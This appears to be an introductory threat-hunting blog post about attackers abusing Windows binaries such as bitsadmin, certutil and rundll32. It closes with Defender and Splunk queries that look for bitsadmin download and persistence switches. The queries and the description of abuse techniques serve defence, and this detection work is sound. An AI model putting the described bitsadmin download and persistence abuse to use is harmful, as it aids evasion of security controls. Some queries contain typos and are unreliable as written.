What are LolBins?
“LolBins” or Living of the Land Binaries, is a term used to describe the exploitation of legitimate operating system binaries (hence the “Bin” in “LolBins”) to execute malicious code. Attackers can use LolBins to bypass security measures that are designed to detect and block known malicious files, as these binaries are already present on the system and are often whitelisted by security software.
Essentially, attackers use existing system tools, such as PowerShell, Windows Management Instrumentation (WMI), or the Command Prompt, to run their own malicious code. These tools are commonly used by legitimate system administrators for routine tasks, so they are not typically flagged by security software or blocked by firewalls.
LolBins attacks can be difficult to detect because they use legitimate system processes and are often executed using tools that are considered trusted by default. As a result, they have become an increasingly popular tactic for attackers looking to evade detection and gain persistent access to a compromised system.
These are some examples of malware that utilize legitimate system binaries, known as LolBins, to execute malicious code..
- The Chaes Malware targets customers of an e-commerce platform and abuses system binaries such as msiexec, wscript, and installutil.
- The Egregor Ransomware is a variant of ransomware that has been identified in various sophisticated attacks on organizations worldwide. It uses rundll32 and bitsadmin to carry out its malicious activities.
- The Astaroth Malware is an information stealer that was mainly active in Brazil and abuses regsvr32, wmic, and bitsadmin to steal sensitive data.
- The Ramnit Trojan uses bitsadmin, certutil, and wscript to execute its malicious code in campaigns targeting the UK and Italy. It is often paired with another malware variant called sLoad.
These malware examples highlight the importance of understanding LolBins attacks and implementing security measures to prevent them. The LOLBAS Project on GitHub provides a useful resource for understanding how legitimate system binaries can be exploited for malicious activities.
As a threat hunter, it’s important to understand how legitimate system binaries can be abused for malicious purposes and to focus on trending binaries to detect anomalies in their usage. For example, let’s consider the BITSadmin tool. A search on Google reveals that BITSAdmin is a command-line tool used to create, download, or upload jobs and monitor their progress.
To understand how attackers abuse BITSadmin, we can refer to the BITSadmin page on the LOLBAS Project, which lists common abuses of this tool, such as downloading files from external sources, executing files, and copying and adding data to Alternate Data Streams (ADS). We can also research real-life examples of BITSadmin abuse by reading blog posts and articles about it.
By examining these sources, we can learn about the command-line syntax used in real attacks, the process tree behavior associated with malicious usage of BITSadmin, and other suspicious file events. We can then use this information to create hunting queries that will help us detect anomalies in BITSadmin usage and identify potential threats.
Some examples of blog posts that describe real-life abuses of BITSadmin can help us better understand how this tool is being used in attacks.
- Based on this tweet, it appears that BITSadmin is being used to copy and move files. Attackers may take advantage of this functionality to move files around a compromised system or to steal sensitive data.
- This statement suggests that in a particular Astaroth attack, the attackers utilized BITSadmin to download multiple binary blobs from a command-and-control (C2) server. This is an example of how legitimate system binaries can be used for malicious purposes, and it highlights the importance of understanding how these tools can be exploited by attackers.
- By analyzing the sandbox reports provided by VirusTotal, we can gain a better understanding of the related chains of executions used in a particular malware sample. In the case of the Astaroth sample, the reports may reveal the usage of CMD, wscript.exe, and BITSadmin, which are commonly exploited by attackers to execute malicious code on a compromised system.
By examining the examples of LolBins abuse provided earlier, we can identify potential behavioral patterns that can be used to create hunting queries to detect malicious activity in our network. One approach is to focus on identifying executions of the tool in our network and excluding all legitimate instances. We can achieve this by looking for patterns in legitimate command lines, parent processes, machine names, usernames, timestamps, and other relevant factors. It’s important to be specific in our search to avoid missing any malicious instances.
We can also expand our search to include the timeframe of the attack and look for other Tactics, Techniques, and Procedures (TTPs) that occurred before and after the specific time of the attack phase. This can help us identify other potential indicators of compromise that may be related to the attack or provide additional context.
In cases where there are too many different instances of execution to exclude everything, we can start adding filters and looking for patterns. The most useful filters to consider are the command line and process tree (parent or child). By identifying common patterns in these areas, we can develop more effective hunting queries that are better tailored to our specific environment and more likely to detect malicious activity.
The below are some examples to hunt for BitsAdmin activity.
- BitsAdmin download activity (using 365 Defender)
DeviceProcessEvent | where ProcessVersionInfoOriginalFileName == "bitsadmin.exe" | where ProcessCommandLine contains "/addfile"s
- BitsAdmin download activity (using Splunk)
| tstats summariesonly=false allow_old_summaries=true count, min(_time) AS firstTime, max(_time) AS lastTime FROM datamodel=Endpoint.Processes WHERE (("Processes.process_name"=bitsadmin.exe OR "Processes.original_file_name"=bitsadmin.exe) "Processes.process"=*transfer*) BY "Processes.dest", "Processes.user", "Processes.parent_process", "Processes.original_file_name", "Processes.process_name", "Processes.process", "Processes.process_id", "Processes.parent_process_id"
| rename "Processes.*" AS "*"
| convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(firstTime)
| convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(lastTime) - BitsAdmin create a persistent job activity (using 365 Defender)
DeviceProcessEvent | where ProcessVersionInfoOriginalFileName == "bitsadmin.exe" | where ProcessCommandLine contains "/SetNotifyCmdLine"s
- BitsAdmin create a persistent job activity (using Splunk)
| tstats summariesonly=false allow_old_summaries=true count, min(_time) AS firstTime, max(_time) AS lastTime FROM datamodel=Endpoint.Processes WHERE (("Processes.process_name"=bitsadmin.exe OR "Processes.original_file_name"=bitsadmin.exe) ("Processes.process"=*create* OR "Processes.process"=*addfile* OR "Processes.process"=*setnotifyflags* OR "Processes.process"=*setnotifycmdline* OR "Processes.process"=*setminretrydelay* OR "Processes.process"=*setcustomheaders* OR "Processes.process"=*resume*)) BY "Processes.dest", "Processes.user", "Processes.original_file_name", "Processes.parent_process", "Processes.process_name", "Processes.process", "Processes.process_id", "Processes.parent_process_id"
| rename "Processes.*" AS "*"
| convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(firstTime)
| convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(lastTime) In conclusion, threat hunting is a vast and ever-evolving field that can seem daunting to those new to it. However, the purpose of this blog is to provide an introduction to threat hunting and share some simple methods that you can use to get started.
There are many different approaches to threat hunting, including searches for Indicators of Compromise (IOCs) or Indicators of Behavior (IOBs). While IOCs are static artifacts such as file hashes, IP addresses, and domain names, IOBs refer to the set of behaviors associated with an attack, independent of tools or artifacts.
The goal of this blog is to encourage readers to explore the world of threat hunting and to provide a starting point for those new to the field. By developing an understanding of common attack techniques and tactics, and by leveraging various tools and techniques, threat hunters can proactively identify and mitigate threats to their organization.
You can look at our Founder talk abouth this topic at Youtube
